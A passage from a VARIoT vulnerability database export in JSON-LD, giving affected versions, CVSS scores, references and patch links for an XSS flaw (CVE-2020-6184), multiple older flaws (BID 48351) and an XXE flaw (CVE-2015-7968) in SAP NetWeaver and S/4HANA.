"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-202002-1419
Vulnerability from variot
Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability. SAP NetWeaver and SAP S/4HANA Exists in a cross-site scripting vulnerability.Information may be obtained and tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-1419",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.54"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.51"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "s\\/4hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.52"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.50"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.51"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.52"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.53"
},
{
"model": "s/4 hana",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.54"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"db": "NVD",
"id": "CVE-2020-6184"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.51:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.52:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:s\\/4hana:7.54:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6184"
}
]
},
"cve": "CVE-2020-6184",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-002066",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2020-002066",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-6184",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2020-6184",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2020-002066",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-712",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability. SAP NetWeaver and SAP S/4HANA Exists in a cross-site scripting vulnerability.Information may be obtained and tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-6184",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002066",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202002-712",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
]
},
"id": "VAR-202002-1419",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:56:11.137000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - February 2020",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=537788812"
},
{
"title": "SAP NetWeaver and SAP S/4HANA Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=112469"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"db": "NVD",
"id": "CVE-2020-6184"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2863397"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=537788812"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6184"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-6184"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"date": "2020-02-12T20:15:13.997000",
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002066"
},
{
"date": "2020-02-19T20:07:29.200000",
"db": "NVD",
"id": "CVE-2020-6184"
},
{
"date": "2020-03-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver and SAP S/4HANA Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002066"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-712"
}
],
"trust": 0.6
}
}
var-201106-0382
Vulnerability from variot
SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, an information-disclosure vulnerability, and an authentication-bypass vulnerability. An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, disclose sensitive information, or bypass certain security restrictions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201106-0382",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "48351"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov and Dmitriy Evdokimov from DSecRG",
"sources": [
{
"db": "BID",
"id": "48351"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, an information-disclosure vulnerability, and an authentication-bypass vulnerability.\nAn attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, disclose sensitive information, or bypass certain security restrictions.",
"sources": [
{
"db": "BID",
"id": "48351"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "48351",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "48351"
}
]
},
"id": "VAR-201106-0382",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4925504733333334
},
"last_update_date": "2022-05-17T01:46:44.541000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=323"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=324"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=325"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=326"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "48351"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "48351"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-17T00:00:00",
"db": "BID",
"id": "48351"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-17T00:00:00",
"db": "BID",
"id": "48351"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "48351"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Multiple Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "48351"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "48351"
}
],
"trust": 0.3
}
}
var-202003-1193
Vulnerability from variot
nwbc_ext2int in SAP NetWeaver Application Server before Security Note 2183189 allows XXE attacks for local file inclusion via the sap/bc/ui2/nwbc/nwbc_ext2int/ URI. SAP NetWeaver Application Server To XML There is a vulnerability in an external entity.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1193",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server",
"scope": "lt",
"trust": 1.0,
"vendor": "sap",
"version": "2183189"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "security note 2183189"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "NVD",
"id": "CVE-2015-7968"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2183189",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7968"
}
]
},
"cve": "CVE-2015-7968",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2015-008624",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2015-7968",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cve@mitre.org",
"availabilityImpact": "LOW",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.1,
"impactScore": 2.7,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2015-008624",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-7968",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2015-7968",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2015-008624",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-305",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2015-7968",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-7968"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008624"
},
{
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"db": "NVD",
"id": "CVE-2015-7968"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-305"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
